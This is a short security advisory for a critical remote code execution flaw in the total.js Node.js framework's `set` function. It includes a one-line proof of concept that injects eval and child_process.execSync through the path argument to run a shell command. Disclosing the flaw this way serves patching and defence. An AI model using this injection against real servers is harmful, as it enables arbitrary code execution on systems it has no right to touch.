CRITICAL 9.8
GHSA-3wj8-vp9h-rm6m
total.js Remote Code Execution Vulnerability
Details
total.js is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. It can be used as web, desktop, service or IoT application.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) via `set`.
### PoC ```js // To be run in a nodejs console: require('total.js/utils').set({}, 'a;eval(`require("child_process")\\x2eexecSync("touch pwned")`);//') ```
Are you affected?
Enter the version of the package you're using.